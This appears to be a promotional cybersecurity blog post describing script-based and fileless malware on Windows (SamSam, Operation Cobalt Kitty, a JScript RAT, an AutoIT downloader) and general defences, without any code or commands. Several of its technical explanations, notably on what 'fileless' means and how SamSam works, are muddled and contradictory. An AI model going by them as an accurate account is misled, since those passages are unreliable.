Script-Based Malware: A New Attacker Trend on Internet Explorer

Over the past few months, a sophisticated script-based malware has been detected through Internet Explorer (IE) browser exploits that infect Windows Operating System (OS) users. You probably think of either a movie script or JavaScript, when you hear the word “script”. Although most of us don’t see movie scripts, JavaScript is a bit more readily available, as it’s one of the many scripting languages that programmers commonly use to enhance website features. Unfortunately, the bad guys are now leveraging its popularity, too, as cybercriminals use scripting techniques to enhance the strength of their cyberattacks. Hackers are creating script-based malware now more than ever. Do cyberattacks and cybersecurity intrigue you? It’s time to enroll in cybersecurity training and become a cybersecurity analyst.


Learning of the blog

  • What is Script-Based Malware?
  • Script-based techniques
  • Why is it popular?
  • What can you do to guard your devices against script-based malware? 
  • Conclusion


Let’s take a look as to why script-based malware has dramatically increased over the past two years.


What is Script-Based Malware?

Cybercriminals often seek ways to have malicious files installed on your computer. But that doesn’t require a fileless attack. Instead, fileless malware is more sneaky in activating tools, software, and applications that are already integrated into your operating system. Then that malware hides inside your system. Script-based malware is often regarded to be in the same category since it does not drop portable executable (PE) files on the disk. Fileless malware piggybacks on legitimate scripts by performing malicious activity while the legitimate programs continue to run. Fileless malware can remain undetected because it’s based on memory, not on file. Antivirus software often works with other malware types, because it detects the traditional footprints of a signature. 


Script-based techniques

Script-based techniques may not be fileless, but they may be challenging to detect. Two examples are cobalt kitty operation and SamSam ransomware. Both are malware attacks, using conventional fileless malware attack techniques. Here is a list of examples of script-based malware that is used to infect Windows OS users:



  • SamSam ransomware


SamSam is perceived as semi-fileless. Without the initial script, the payload can not be analyzed while files are being used. That’s because the ransomware payload is decrypted for run-time, making finding a sample of the payload code elusive. The only way a sample can be captured for analysis is to witness the attack while it occurs. SamSam is continually evolving, which makes it difficult to detect and protect against attacks like these. Plus, SamSam requires the involvement of its creator in entering a password. That means it doesn’t automatically spread like other malware. To run, the creator has to enter their payload password or the disk decryption code. This makes it unrivaled in its use for single-purpose, targeted attacks.



  • Operation Cobalt Kitty


Operation Cobalt Kitty is an instance of a fileless attack that spent nearly six months using malicious PowerShell to target an Asian corporation. More than 40 PCs and servers were infiltrated via a spear-phishing email.



  • JScript Remote Access Trojan (RAT)


It ensures persistence on the target system and then uses an encoded network connection to connect to the attacker. After that, the attacker can perform arbitrary commands on the target machine to have potentially full control of it. 



  • AutoIT downloader 


The AutoIT downloader uses network connection and script functions to download and execute malware, which could be used to infect targeted systems with malware such as ransomware, spyware, etc.

Why is it popular?

Scripting languages were initially designed to automate and simplify the execution of tasks in the Windows environment. So these languages have various functions to ease calls to the Windows API. Because of the ease of usage of these functions, establishing a network connection or interacting with the Windows environment is pretty simple for an attacker. Scripting languages are often higher than C or C++ and are more comfortable for attackers to learn and more accessible. With just a few code lines, attackers can build a functioning and flexible malicious program with many features such as network connection, persistence on the targeted system, command execution, etc., making them more comfortable for eager hackers to sell to. Evasion is probably the key reason behind this attack tactic’s popularity since scripts are easy to obfuscate and, therefore, hard to detect. The scripting languages used by these attackers specifically include JavaScript, VBScript, PHP, PowerShell, and others. Cybersecurity experts, along with much other malware, have seen Bartallex, Kovter, Nemucod, and W97/Downloader using these scripts to deliver malicious payloads to victims’ devices. For example, in 2016, the use of multiple obfuscated layers of JavaScript has spread to Locky. They also saw fileless malware being executed with the aid of a PowerShell script. 


What can you do to guard your devices against script-based malware? 

The best way to prevent script-based malware infections from your devices is to stop them before they happen. However, legacy antivirus solutions, once relied on, no longer get the job done. Security endpoint solutions are being developed for the next generation and will need to be implemented. These so-called endpoint detections and response solutions are based on continuous, real-time monitoring of phishing emails, incoming and outgoing network traffic, and undesirable tasks in operations such as WMI and PowerShell. These fileless attacks oftentimes rely on human vulnerability, which means analyzing and detecting user and system behavior will be central to security. Critical, individual-level best practices include:

  • Being wary of downloading and installing apps.
  • Keeping up-to-date with software applications and security patches.
  • Watching out for phishing emails.
  • Updating browsers.



In this article, we talked about how attackers can use scripts to engage in malicious activities on target Windows machines. These scripts don’t reinvent the wheel but offer attackers flexibility and accessibility. As we saw in our study, these benefits allow the attackers to execute commands and thus possibly have full control over target machines. This may give attackers an incentive to choose this option for these reasons. Infection risk is much lower for organizations with high-end cybersecurity professionals and up-to-date Windows hosts that follow security best practices for secure web browsing. Cyber threats have evolved, and so have we!


Leave a Reply

Your email address will not be published. Required fields are marked *